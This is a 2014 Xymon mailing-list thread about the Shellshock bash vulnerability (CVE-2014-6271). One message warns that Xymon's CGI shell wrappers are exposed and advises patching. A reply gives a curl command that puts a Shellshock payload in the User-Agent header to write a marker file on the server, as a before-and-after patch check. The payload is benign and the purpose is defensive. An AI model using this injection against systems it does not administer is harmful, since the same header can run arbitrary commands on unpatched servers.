[Xymon] FYI: CVE-2014-6271 - bash vulnerability

Troy Adams troy at athabascau.ca
Thu Sep 25 22:09:40 CEST 2014 

Oh, yes, very terrible. 

And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit: 


your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh 
<html><head><title>Invalid request</title></head> 
<body>Invalid request</body></html> 
your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock' 
vulnerable 
your_workstation$ 
...which creates a file (if you are vulnerable) in your Xymon server '/tmp/': 


your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock' 
vulnerable 
your_workstation$ 
...so then, you can verify before and after patching. 


cheers, 

Troy 



----- Original Message ----- 
From: "J.C. Cleaver" <cleaver at terabithia.org> 
To: xymon at xymon.com 
Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain 
Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability 

This is an important one to patch your systems on, if you haven't already. 

The xymon CGI interface runs via shell wrappers around the actual C cgi 
code (to set the environment properly), which means this would be an 
avenue for attack. 

Alternatively, using /bin/dash or some other shell besides bash (often 
/bin/sh on Linux distros) is another work around. (This is the default on 
the Terabithia RPMS for EL6.) 


More info: 
http://seclists.org/oss-sec/2014/q3/650 

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ 
https://access.redhat.com/articles/1200223 


Regards, 
-jc 

_______________________________________________ 
Xymon mailing list 
Xymon at xymon.com 
http://lists.xymon.com/mailman/listinfo/xymon 


-- 
    This communication is intended for the use of the recipient to whom it
    is addressed, and may contain confidential, personal, and or privileged
    information. Please contact us immediately if you are not the intended
    recipient of this communication, and do not copy, distribute, or take
    action relying on it. Any communications received in error, or
    subsequent reply, should be deleted or destroyed.
---
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.xymon.com/pipermail/xymon/attachments/20140925/afaeaa8c/attachment.html>

More information about the Xymon mailing list